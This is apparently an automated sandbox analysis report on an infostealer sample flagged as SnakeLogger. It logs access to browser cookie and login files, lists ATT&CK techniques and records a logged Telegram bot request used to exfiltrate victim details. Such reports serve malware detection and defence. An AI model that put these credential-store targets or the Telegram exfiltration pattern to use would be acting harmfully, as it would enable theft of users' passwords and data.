          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040351C

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 0000000B.00000002.2529814283.0000000020AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7304, type: MEMORYSTR
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7304, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 0000000B.00000002.2529814283.0000000020AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7304, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          2
          Obfuscated Files or Information
          1
          OS Credential Dumping
          2
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          1
          Web Service
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          PowerShell
          Boot or Logon Initialization Scripts1
          Access Token Manipulation
          1
          Software Packing
          LSASS Memory14
          System Information Discovery
          Remote Desktop Protocol1
          Data from Local System
          3
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
          Process Injection
          1
          DLL Side-Loading
          Security Account Manager211
          Security Software Discovery
          SMB/Windows Admin Shares1
          Email Collection
          11
          Encrypted Channel
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
          Masquerading
          NTDS1
          Process Discovery
          Distributed Component Object Model1
          Clipboard Data
          3
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script131
          Virtualization/Sandbox Evasion
          LSA Secrets131
          Virtualization/Sandbox Evasion
          SSHKeylogging14
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Access Token Manipulation
          Cached Domain Credentials1
          Application Window Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
          Process Injection
          DCSync1
          System Network Configuration Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576727 Sample: 87h216Snb7.exe Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 24 reallyfreegeoip.org 2->24 26 api.telegram.org 2->26 28 4 other IPs or domains 2->28 36 Found malware configuration 2->36 38 Multi AV Scanner detection for dropped file 2->38 40 Multi AV Scanner detection for submitted file 2->40 46 4 other signatures 2->46 8 87h216Snb7.exe 5 25 2->8         started        signatures3 42 Tries to detect the country of the analysis system (by using the IP) 24->42 44 Uses the Telegram API (likely for C&C communication) 26->44 process4 process5 10 powershell.exe 30 8->10         started        file6 20 C:\Users\user\AppData\...\87h216Snb7.exe, PE32 10->20 dropped 22 C:\Users\...\87h216Snb7.exe:Zone.Identifier, ASCII 10->22 dropped 48 Early bird code injection technique detected 10->48 50 Writes to foreign memory regions 10->50 52 Found suspicious powershell code related to unpacking or dynamic code loading 10->52 54 3 other signatures 10->54 14 msiexec.exe 15 8 10->14         started        18 conhost.exe 10->18         started        signatures7 process8 dnsIp9 30 api.telegram.org 149.154.167.220, 443, 49854 TELEGRAMRU United Kingdom 14->30 32 checkip.dyndns.com 193.122.130.0, 49778, 49794, 49802 ORACLE-BMC-31898US United States 14->32 34 3 other IPs or domains 14->34 56 Tries to steal Mail credentials (via file / registry access) 14->56 58 Tries to harvest and steal browser information (history, passwords, etc) 14->58 60 Hides threads from debuggers 14->60 signatures10

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          87h216Snb7.exe42%ReversingLabsWin32.Trojan.SnakeLogger
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde\87h216Snb7.exe42%ReversingLabsWin32.Trojan.SnakeLogger
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          drive.google.com
          172.217.19.174
          truefalse
            high
            drive.usercontent.google.com
            142.250.181.97
            truefalse
              high
              reallyfreegeoip.org
              104.21.67.152
              truefalse
                high
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  checkip.dyndns.com
                  193.122.130.0
                  truefalse
                    high
                    checkip.dyndns.org
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://reallyfreegeoip.org/xml/8.46.123.189false
                        high
                        http://checkip.dyndns.org/false
                          high
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2018/12/2024%20/%2010:14:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.office.com/msiexec.exe, 0000000B.00000002.2529814283.0000000020C75000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020C66000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://duckduckgo.com/chrome_newtabmsiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.1534256640.0000000005799000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000007.00000002.1531343909.0000000004886000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/ac/?q=msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.orgmsiexec.exe, 0000000B.00000002.2529814283.0000000020B93000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://drive.usercontent.google.com/ekmsiexec.exe, 0000000B.00000003.1661339544.0000000005013000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2517147937.0000000004FFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icomsiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.1531343909.0000000004886000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://api.telegram.org/botmsiexec.exe, 0000000B.00000002.2529814283.0000000020B93000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000007.00000002.1531343909.0000000004886000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.1531343909.0000000004886000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://contoso.com/Licensepowershell.exe, 00000007.00000002.1534256640.0000000005799000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.office.com/lBmsiexec.exe, 0000000B.00000002.2529814283.0000000020C70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://contoso.com/Iconpowershell.exe, 00000007.00000002.1534256640.0000000005799000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://drive.usercontent.google.com/msiexec.exe, 0000000B.00000003.1661339544.0000000005013000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2517147937.0000000004FFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
